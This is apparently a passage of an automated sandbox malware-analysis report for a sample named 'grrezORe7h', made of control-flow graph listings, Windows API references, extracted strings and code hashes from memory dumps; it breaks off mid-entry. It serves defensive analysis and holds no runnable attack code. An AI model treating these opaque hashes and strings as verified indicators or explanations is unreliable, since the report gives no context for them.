                                                                                                                      control_flow_graph 103 1566b8-1566ed 104 1566f3-156716 103->104 105 156b1c-156b20 103->105 114 1567c4-1567c8 104->114 115 15671c-156729 104->115 106 156b22-156b36 105->106 107 156b39-156b47 105->107 111 156b49-156b5e 107->111 112 156bb8-156bcd 107->112 121 156b65-156b72 111->121 122 156b60-156b63 111->122 123 156bd4-156be1 112->123 124 156bcf-156bd2 112->124 118 156810-156819 114->118 119 1567ca-1567d8 114->119 127 156738 115->127 128 15672b-156736 115->128 125 156c2f 118->125 126 15681f-156829 118->126 119->118 139 1567da-1567f5 119->139 129 156b74-156bb5 121->129 122->129 130 156be3-156c1e 123->130 124->130 133 156c34-156c4d 125->133 126->105 131 15682f-156838 126->131 134 15673a-15673c 127->134 128->134 174 156c25-156c2c 130->174 137 156847-156853 131->137 138 15683a-15683f 131->138 134->114 141 156742-1567a4 134->141 137->133 144 156859-15685f 137->144 138->137 157 1567f7-156801 139->157 158 156803 139->158 185 1567a6 141->185 186 1567aa-1567c1 141->186 146 156865-156875 144->146 147 156b06-156b0a 144->147 155 156877-156887 146->155 156 156889-15688b 146->156 147->125 150 156b10-156b16 147->150 150->105 150->131 162 15688e-156894 155->162 156->162 163 156805-156807 157->163 158->163 162->147 168 15689a-1568a9 162->168 163->118 169 156809 163->169 171 156957-156982 call 156500 * 2 168->171 172 1568af 168->172 169->118 189 156a6c-156a86 171->189 190 156988-15698c 171->190 176 1568b2-1568c3 172->176 176->133 178 1568c9-1568db 176->178 178->133 181 1568e1-1568fb call 156c98 178->181 184 156901-156911 181->184 184->147 188 156917-15691a 184->188 185->186 186->114 191 156924-156927 188->191 192 15691c-156922 188->192 189->105 210 156a8c-156a90 189->210 190->147 195 156992-156996 190->195 191->125 193 15692d-156930 191->193 192->191 192->193 196 156932-156936 193->196 197 156938-15693b 193->197 199 1569be-1569c4 195->199 200 156998-1569a5 195->200 196->197 201 156941-156945 196->201 197->125 197->201 202 1569c6-1569ca 199->202 203 1569ff-156a05 199->203 213 1569b4 200->213 214 1569a7-1569b2 200->214 201->125 208 15694b-156951 201->208 202->203 209 1569cc-1569d5 202->209 204 156a07-156a0b 203->204 205 156a11-156a17 203->205 204->174 204->205 211 156a23-156a25 205->211 212 156a19-156a1d 205->212 208->171 208->176 215 1569e4-1569fa 209->215 216 1569d7-1569dc 209->216 217 156a92-156a9c call 1553a8 210->217 218 156acc-156ad0 210->218 219 156a27-156a30 211->219 220 156a5a-156a5c 211->220 212->147 212->211 221 1569b6-1569b8 213->221 214->221 215->147 216->215 217->218 231 156a9e-156ab3 217->231 218->174 222 156ad6-156ada 218->222 225 156a32-156a37 219->225 226 156a3f-156a55 219->226 220->147 227 156a62-156a69 220->227 221->147 221->199 222->174 229 156ae0-156aed 222->229 225->226 226->147 234 156afc 229->234 235 156aef-156afa 229->235 231->218 240 156ab5-156aca 231->240 237 156afe-156b00 234->237 235->237 237->147 237->174 240->105 240->218
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (odq$(odq$(odq$(odq$(odq$(odq$,hq$,hq
                                                                                                                      • API String ID: 0-1376594924
                                                                                                                      • Opcode ID: 9d7a95147a75131c14bbecd4bd2ce6ae438fa4ae1394b1d8d1c17e13e7bd528a
                                                                                                                      • Instruction ID: b90ff98bbb3d48bf00e874fa022889217f35bd2a2add5f9f719acecba41d6500
                                                                                                                      • Opcode Fuzzy Hash: 9d7a95147a75131c14bbecd4bd2ce6ae438fa4ae1394b1d8d1c17e13e7bd528a
                                                                                                                      • Instruction Fuzzy Hash: 2C126B30A00208DFCB14CF69D994AAEBBF2FF48316F558559E869DB261DB30ED45CB90

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 244 1519b8-151a13 248 151a35-151a84 244->248 249 151a15-151a34 244->249 253 151a86-151a8d 248->253 254 151a9f 248->254 255 151a96-151a9d 253->255 256 151a8f-151a94 253->256 258 151aa7 254->258 257 151aaa-151abe 255->257 256->257 260 151ad4-151adc 257->260 261 151ac0-151ac7 257->261 258->257 264 151ade-151ae2 260->264 262 151acd-151ad2 261->262 263 151ac9-151acb 261->263 262->264 263->264 266 151ae4-151af9 264->266 267 151b42-151b45 264->267 266->267 275 151afb-151afe 266->275 268 151b47-151b5c 267->268 269 151b8d-151b93 267->269 268->269 279 151b5e-151b62 268->279 270 15268e 269->270 271 151b99-151b9b 269->271 276 152693-152ca1 270->276 271->270 273 151ba1-151ba6 271->273 277 15263c-152640 273->277 278 151bac 273->278 280 151b00-151b02 275->280 281 151b1d-151b3b call 1502a8 275->281 304 152ca3-152ca5 276->304 305 152cb2-152cba 276->305 283 152647-15268d 277->283 284 152642-152645 277->284 278->277 285 151b64-151b68 279->285 286 151b6a-151b88 call 1502a8 279->286 280->281 287 151b04-151b07 280->287 281->267 284->276 284->283 285->269 285->286 286->269 287->267 291 151b09-151b1b 287->291 291->267 291->281 306 152ca7-152ca9 304->306 307 152cab-152cb0 304->307 308 152cbc-152cca 305->308 306->308 307->308 311 152ce0-152ce8 308->311 312 152ccc-152cce 308->312 315 152ceb-152cee 311->315 313 152cd7-152cde 312->313 314 152cd0-152cd5 312->314 313->315 314->315 317 152d05-152d09 315->317 318 152cf0-152cfe 315->318 319 152d22-152d25 317->319 320 152d0b-152d19 317->320 318->317 324 152d00 318->324 322 152d27-152d2b 319->322 323 152d2d-152d62 319->323 320->319 329 152d1b 320->329 322->323 326 152d64-152d7b 322->326 331 152dc4-152dc9 323->331 324->317 327 152d81-152d8d 326->327 328 152d7d-152d7f 326->328 332 152d97-152da1 327->332 333 152d8f-152d95 327->333 328->331 329->319 334 152da9 332->334 335 152da3 332->335 333->334 337 152db1-152dbd 334->337 335->334 337->331
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Xhq$Xhq$Xhq$Xhq$Xhq$Xhq
                                                                                                                      • API String ID: 0-2119377026
                                                                                                                      • Opcode ID: 647034e0484a14dc89bf08b8a6b95ac606171d804d58eb82e66fa6d916ebb3d0
                                                                                                                      • Instruction ID: d286467f5a868808ef43a2f02486a5df921961cf3ef2b252acb066f2b342f753
                                                                                                                      • Opcode Fuzzy Hash: 647034e0484a14dc89bf08b8a6b95ac606171d804d58eb82e66fa6d916ebb3d0
                                                                                                                      • Instruction Fuzzy Hash: E542DAA7E1D3E18FCB124B705CB82597FB17B62106BEE458EC8C297283EBA94445C352

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 937 377d0980-377d0a0f GetCurrentProcess 941 377d0a18-377d0a4c GetCurrentThread 937->941 942 377d0a11-377d0a17 937->942 943 377d0a4e-377d0a54 941->943 944 377d0a55-377d0a89 GetCurrentProcess 941->944 942->941 943->944 945 377d0a8b-377d0a91 944->945 946 377d0a92-377d0aaa 944->946 945->946 958 377d0aad call 377d0b4f 946->958 959 377d0aad call 377d0f31 946->959 950 377d0ab3-377d0ae2 GetCurrentThreadId 951 377d0aeb-377d0b4d 950->951 952 377d0ae4-377d0aea 950->952 952->951 958->950 959->950
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 377D09FE
                                                                                                                      • GetCurrentThread.KERNEL32 ref: 377D0A3B
                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 377D0A78
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 377D0AD1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2063062207-0
                                                                                                                      • Opcode ID: a71b964aec369ad8c144ee5e0267eb41e3b8713c729721607bb8808f20fee034
                                                                                                                      • Instruction ID: b92326cf6dbc27590540615713cc012e1700877ebf6fa1774e8a6d5ed0f3e9e0
                                                                                                                      • Opcode Fuzzy Hash: a71b964aec369ad8c144ee5e0267eb41e3b8713c729721607bb8808f20fee034
                                                                                                                      • Instruction Fuzzy Hash: D35148B49003099FDB04DFAAC548B9EBBF5EF88310F20C45AE459B7261DB34A981CF65

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 960 373ad548-373ad66d 979 373ad673-373ad6b9 960->979 980 373ad710-373ad741 960->980 985 373ad6bb-373ad6bf 979->985 986 373ad6c4-373ad70f 979->986 987 373ad747-373ad75e 980->987 985->986
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4'dq$4'dq$dr07$)67
                                                                                                                      • API String ID: 0-1175389036
                                                                                                                      • Opcode ID: 5eb5773fab2a60b575a3c5a88a8bcfd98731e94e8f669eedbf5049589922e429
                                                                                                                      • Instruction ID: 899076980800ca13d4015420dfaa0f3e26f9c04f749dddaf5999fce616f62dc5
                                                                                                                      • Opcode Fuzzy Hash: 5eb5773fab2a60b575a3c5a88a8bcfd98731e94e8f669eedbf5049589922e429
                                                                                                                      • Instruction Fuzzy Hash: 0A518270A002499FCB05DFA8D995AEEBBB2FF85301F108569E009BB266DB35AD41CF51

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1055 373a7920-373a7941 1056 373a7948-373a797e 1055->1056 1057 373a7943 1055->1057 1060 373a7987-373a79ae 1056->1060 1057->1056 1062 373a7b3d-373a7b46 1060->1062 1063 373a79b4-373a79cc 1060->1063 1066 373a7ae8-373a7b03 1063->1066 1068 373a7b09-373a7b2d 1066->1068 1069 373a79d1-373a7ae7 1066->1069 1069->1066
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <C07$<C07$<C07
                                                                                                                      • API String ID: 0-1182896189
                                                                                                                      • Opcode ID: 2908526cd94070ae52345953b5f3205c888c08a011b89cecb90c430ebcee5ad0
                                                                                                                      • Instruction ID: d5c43df0e21dafe24ede51de918257671f0fd1c0a39aa7f779d03f2cb9bdad4c
                                                                                                                      • Opcode Fuzzy Hash: 2908526cd94070ae52345953b5f3205c888c08a011b89cecb90c430ebcee5ad0
                                                                                                                      • Instruction Fuzzy Hash: DC5102B4D01318DFDB14DFA5C954B9DBBB2FF89301F60812AE809AB255DB356A86CF40

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1523 377dc4d8-377dc4e1 1525 377dc561-377dc567 1523->1525 1526 377dc4e3-377dc4eb 1523->1526 1527 377dd3f0-377dd452 OleInitialize 1525->1527 1526->1525 1528 377dd45b-377dd478 1527->1528 1529 377dd454-377dd45a 1527->1529 1529->1528
                                                                                                                      APIs
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 377DD445
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize
                                                                                                                      • String ID: `w~7
                                                                                                                      • API String ID: 2538663250-1121822653
                                                                                                                      • Opcode ID: 3a19917747587595819822e74688521b1d71366263796d374fb226b4bb64f3d1
                                                                                                                      • Instruction ID: 2b3b00ceaf7b366a2b873581edb5d45675c7bd84103d4d37201c241df551a2be
                                                                                                                      • Opcode Fuzzy Hash: 3a19917747587595819822e74688521b1d71366263796d374fb226b4bb64f3d1
                                                                                                                      • Instruction Fuzzy Hash: 591173B0800348CFDB10DFAAD448BDEBBF4EB48320F20885AD548AB301C774A945CBA5

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1532 154f00-154f22 1533 154f24-154f28 1532->1533 1534 154f38-154f43 1532->1534 1535 154f50-154f57 1533->1535 1536 154f2a-154f36 1533->1536 1537 154f49-154f4b 1534->1537 1538 154feb-155017 1534->1538 1539 154f77-154f80 1535->1539 1540 154f59-154f60 1535->1540 1536->1534 1536->1535 1541 154fe3-154fe8 1537->1541 1545 15501e-155076 1538->1545 1633 154f82 call 154ef0 1539->1633 1634 154f82 call 154f00 1539->1634 1540->1539 1542 154f62-154f6d 1540->1542 1544 154f73-154f75 1542->1544 1542->1545 1544->1541 1564 155085-155097 1545->1564 1565 155078-15507e 1545->1565 1546 154f88-154f8a 1547 154f92-154f9a 1546->1547 1548 154f8c-154f90 1546->1548 1552 154f9c-154fa1 1547->1552 1553 154fa9-154fab 1547->1553 1548->1547 1551 154fad-154fcc 1548->1551 1558 154fe1 1551->1558 1559 154fce-154fd7 1551->1559 1552->1553 1553->1541 1558->1541 1636 154fd9 call 159eb0 1559->1636 1637 154fd9 call 159f6d 1559->1637 1561 154fdf 1561->1541 1567 15509d-1550a1 1564->1567 1568 15512b-15512f call 1552c8 1564->1568 1565->1564 1569 1550b1-1550be 1567->1569 1570 1550a3-1550af 1567->1570 1571 155135-15513b 1568->1571 1578 1550c0-1550ca 1569->1578 1570->1578 1572 155147-15514e 1571->1572 1573 15513d-155143 1571->1573 1576 155145 1573->1576 1577 1551a9-155208 1573->1577 1576->1572 1593 15520f-155233 1577->1593 1581 1550f7-1550fb 1578->1581 1582 1550cc-1550db 1578->1582 1583 155107-15510b 1581->1583 1584 1550fd-155103 1581->1584 1590 1550dd-1550e4 1582->1590 1591 1550eb-1550f5 1582->1591 1583->1572 1589 15510d-155111 1583->1589 1587 155105 1584->1587 1588 155151-1551a2 1584->1588 1587->1572 1588->1577 1592 155117-155129 1589->1592 1589->1593 1590->1591 1591->1581 1592->1572 1601 155235-155237 1593->1601 1602 155239-15523b 1593->1602 1604 1552b1-1552b4 1601->1604 1605 15523d-155241 1602->1605 1606 15524c-15524e 1602->1606 1611 155247-15524a 1605->1611 1612 155243-155245 1605->1612 1608 155261-155267 1606->1608 1609 155250-155254 1606->1609 1616 155292-155294 1608->1616 1617 155269-155290 1608->1617 1614 155256-155258 1609->1614 1615 15525a-15525f 1609->1615 1611->1604 1612->1604 1614->1604 1615->1604 1619 15529b-15529d 1616->1619 1617->1619 1623 1552a3-1552a5 1619->1623 1624 15529f-1552a1 1619->1624 1625 1552a7-1552ac 1623->1625 1626 1552ae 1623->1626 1624->1604 1625->1604 1626->1604 1633->1546 1634->1546 1636->1561 1637->1561
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Hhq$Hhq
                                                                                                                      • API String ID: 0-2450388649
                                                                                                                      • Opcode ID: b92e2ae6820962fec056920e69860bad20ebf907bcbf76fb801720126ecaab10
                                                                                                                      • Instruction ID: 345843d9c1c947d779bcf695406360930b58f2fef00ac557de09c4e935026f73
                                                                                                                      • Opcode Fuzzy Hash: b92e2ae6820962fec056920e69860bad20ebf907bcbf76fb801720126ecaab10
                                                                                                                      • Instruction Fuzzy Hash: 04B1AE34304614CFCB159F39C864B6A7BE2AF88306F158569E91ACF2A5CB74CC85DB91

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1638 155460-15546d 1639 155475-155477 1638->1639 1640 15546f-155473 1638->1640 1641 155688-15568f 1639->1641 1640->1639 1642 15547c-155487 1640->1642 1643 155690 1642->1643 1644 15548d-155494 1642->1644 1647 155695-1556cd 1643->1647 1645 155629-15562f 1644->1645 1646 15549a-1554a9 1644->1646 1649 155635-155639 1645->1649 1650 155631-155633 1645->1650 1646->1647 1648 1554af-1554be 1646->1648 1668 1556d6-1556da 1647->1668 1669 1556cf-1556d4 1647->1669 1656 1554c0-1554c3 1648->1656 1657 1554d3-1554d6 1648->1657 1651 155686 1649->1651 1652 15563b-155641 1649->1652 1650->1641 1651->1641 1652->1643 1654 155643-155646 1652->1654 1654->1643 1658 155648-15565d 1654->1658 1659 1554c5-1554c8 1656->1659 1660 1554e2-1554e8 1656->1660 1657->1660 1661 1554d8-1554db 1657->1661 1677 155681-155684 1658->1677 1678 15565f-155665 1658->1678 1663 1554ce 1659->1663 1664 1555c9-1555cf 1659->1664 1670 155500-15551d 1660->1670 1671 1554ea-1554f0 1660->1671 1665 1554dd 1661->1665 1666 15552e-155534 1661->1666 1674 1555f4-155601 1663->1674 1672 1555e7-1555f1 1664->1672 1673 1555d1-1555d7 1664->1673 1665->1674 1675 155536-15553c 1666->1675 1676 15554c-15555e 1666->1676 1679 1556e0-1556e2 1668->1679 1669->1679 1711 155526-155529 1670->1711 1680 1554f4-1554fe 1671->1680 1681 1554f2 1671->1681 1672->1674 1684 1555d9 1673->1684 1685 1555db-1555e5 1673->1685 1702 155615-155617 1674->1702 1703 155603-155607 1674->1703 1687 155540-15554a 1675->1687 1688 15553e 1675->1688 1696 155560-15556c 1676->1696 1697 15556e-155591 1676->1697 1677->1641 1689 155677-15567a 1678->1689 1690 155667-155675 1678->1690 1682 1556e4-1556f6 1679->1682 1683 1556f7-1556fe 1679->1683 1680->1670 1681->1670 1684->1672 1685->1672 1687->1676 1688->1676 1689->1643 1692 15567c-15567f 1689->1692 1690->1643 1690->1689 1692->1677 1692->1678 1712 1555b9-1555c7 1696->1712 1697->1643 1715 155597-15559a 1697->1715 1706 15561b-15561e 1702->1706 1703->1702 1705 155609-15560d 1703->1705 1705->1643 1707 155613 1705->1707 1706->1643 1708 155620-155623 1706->1708 1707->1706 1708->1645 1708->1646 1711->1674 1712->1674 1715->1643 1716 1555a0-1555b2 1715->1716 1716->1712
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,hq$,hq
                                                                                                                      • API String ID: 0-3475114797
                                                                                                                      • Opcode ID: 6187d6a0d18473a79f30999f965d20a44d06abad836bf595dad8e8d1a195b5c2
                                                                                                                      • Instruction ID: fdc085c50cb00060190fc20b276270ed713861b020ae55b6f928e75102e671f9
                                                                                                                      • Opcode Fuzzy Hash: 6187d6a0d18473a79f30999f965d20a44d06abad836bf595dad8e8d1a195b5c2
                                                                                                                      • Instruction Fuzzy Hash: 18818D74A10945CFCB14CF69C4A49AAB7B3BF88316B658069E825DF361EB31EC45CB50

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1718 150b29-150b4a 1719 150b51-150ba6 call 1507b4 1718->1719 1720 150b4c 1718->1720 1728 150bab-150bae call 150ec8 1719->1728 1720->1719 1729 150bb4-150c7b call 1507b4 * 4 1728->1729 1750 150c86-150c94 1729->1750 1751 150c9d-150ca6 1750->1751 1752 150cae-150cb7 1751->1752 1783 150cba call 1517c8 1752->1783 1784 150cba call 1517ba 1752->1784 1753 150cc0-150cc6 1785 150cc9 call 1519b6 1753->1785 1786 150cc9 call 151a40 1753->1786 1787 150cc9 call 1519b8 1753->1787 1754 150ccf-150cd5 1788 150cd8 call 1519b6 1754->1788 1789 150cd8 call 151a40 1754->1789 1790 150cd8 call 152c60 1754->1790 1791 150cd8 call 1519b8 1754->1791 1792 150cd8 call 152c88 1754->1792 1755 150cde-150ce7 1793 150cea call 15324d 1755->1793 1794 150cea call 153168 1755->1794 1756 150cf0-150d05 1758 150d0e-150d1a call 154328 1756->1758 1759 150d20-150e88 1758->1759 1783->1753 1784->1753 1785->1754 1786->1754 1787->1754 1788->1755 1789->1755 1790->1755 1791->1755 1792->1755 1793->1756 1794->1756
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LRdq$`'V4
                                                                                                                      • API String ID: 0-2300282449
                                                                                                                      • Opcode ID: f18398aca40412fba2f4317fd5e79984ae84fdcbb7d9160e67d03bb07a26bb60
                                                                                                                      • Instruction ID: d2107e0d3ffaac3e96ca263bb1c57b2136ae16e381fca7ca608092616f2bb697
                                                                                                                      • Opcode Fuzzy Hash: f18398aca40412fba2f4317fd5e79984ae84fdcbb7d9160e67d03bb07a26bb60
                                                                                                                      • Instruction Fuzzy Hash: 39A1C674A10259CFCB04DFA8E99499DBBB1FB58302B10562AF409BB365DF346D86CF80

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1796 150b30-150b4a 1797 150b51-150cb7 call 1507b4 call 150ec8 call 1507b4 * 4 1796->1797 1798 150b4c 1796->1798 1860 150cba call 1517c8 1797->1860 1861 150cba call 1517ba 1797->1861 1798->1797 1831 150cc0-150cc6 1862 150cc9 call 1519b6 1831->1862 1863 150cc9 call 151a40 1831->1863 1864 150cc9 call 1519b8 1831->1864 1832 150ccf-150cd5 1865 150cd8 call 1519b6 1832->1865 1866 150cd8 call 151a40 1832->1866 1867 150cd8 call 152c60 1832->1867 1868 150cd8 call 1519b8 1832->1868 1869 150cd8 call 152c88 1832->1869 1833 150cde-150ce7 1870 150cea call 15324d 1833->1870 1871 150cea call 153168 1833->1871 1834 150cf0-150d1a call 154328 1837 150d20-150e88 1834->1837 1860->1831 1861->1831 1862->1832 1863->1832 1864->1832 1865->1833 1866->1833 1867->1833 1868->1833 1869->1833 1870->1834 1871->1834
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LRdq$`'V4
                                                                                                                      • API String ID: 0-2300282449
                                                                                                                      • Opcode ID: 6d35a9c0d159d27a4d099f7973312d6997a78bd8ae31c074b2cef1df882dec4c
                                                                                                                      • Instruction ID: 5bb2dbd47e4c9e1735b16b5dd431c9b42287022ea6eaa6d2cd2f2fc701fb84ae
                                                                                                                      • Opcode Fuzzy Hash: 6d35a9c0d159d27a4d099f7973312d6997a78bd8ae31c074b2cef1df882dec4c
                                                                                                                      • Instruction Fuzzy Hash: DFA1C774A10259DFCB04DFA8E99499DBBB1FB58302B10562AF409BB365DF346D86CF80
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <C07$<C07
                                                                                                                      • API String ID: 0-2744721049
                                                                                                                      • Opcode ID: b8b0ba7e43e4227f7671888467cfdce3e24fcd15f4ec1860d39061d4023e2c0c
                                                                                                                      • Instruction ID: 52665857edfc54c66cb0c971be74ab237ff425d1bfbdf0ffa9bb47dc57a57af8
                                                                                                                      • Opcode Fuzzy Hash: b8b0ba7e43e4227f7671888467cfdce3e24fcd15f4ec1860d39061d4023e2c0c
                                                                                                                      • Instruction Fuzzy Hash: 5A2133B0D02318DFEB00CFA5D4447EEBBB2AF89300F50842AD419BB254EB755A8ACF40
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4'dq$4'dq
                                                                                                                      • API String ID: 0-2306408947
                                                                                                                      • Opcode ID: cadc4938f207b1eedb31c2de74ff9873111e878ddbe94041d79353826043afad
                                                                                                                      • Instruction ID: 7b5ffdfdda3f6ad47eaa58d80a5cefaf57853e65472600da6c18329693099953
                                                                                                                      • Opcode Fuzzy Hash: cadc4938f207b1eedb31c2de74ff9873111e878ddbe94041d79353826043afad
                                                                                                                      • Instruction Fuzzy Hash: 76F04F353002146FDB085AAA985597B7ADBEFD83A2B148429FD1DCB391DE71CC0187A0
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 377D0222
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 716092398-0
                                                                                                                      • Opcode ID: bf51363bccba015036ab6b5e010cd9e1f7c330ec25c1438376b273e28d56319a
                                                                                                                      • Instruction ID: 6bc0581c981ea112f2cf02e226cc7103eec5e7373f05581dd1ba59512b28868b
                                                                                                                      • Opcode Fuzzy Hash: bf51363bccba015036ab6b5e010cd9e1f7c330ec25c1438376b273e28d56319a
                                                                                                                      • Instruction Fuzzy Hash: 6D51F0B1C00349AFDF05CF99C984ACEBFB6BF48310F24852AE818AB220D771A841CF50
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 377D0222
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 716092398-0
                                                                                                                      • Opcode ID: 5b8ca21bcaaac72cf17ba9460d72c77f446adaffe507c0cc5eab4712e9448421
                                                                                                                      • Instruction ID: b0536f3509fa8e471f7c5f034d62d82e5a30bfa496e6045cfa49aec5040756cf
                                                                                                                      • Opcode Fuzzy Hash: 5b8ca21bcaaac72cf17ba9460d72c77f446adaffe507c0cc5eab4712e9448421
                                                                                                                      • Instruction Fuzzy Hash: C551D0B5D00309EFDB14CF99C984ADEFBB6BF48310F60852AE818AB210D771A941CF91
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 377D0222
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 716092398-0
                                                                                                                      • Opcode ID: 9cef3dc2218f5d7fb0298f8c24bbc1d8d56bd21a603d8446803f1c1803099e2e
                                                                                                                      • Instruction ID: f8bf44388a146205a914b421b36da437a73505a29579fc6667d482cd42cefd8b
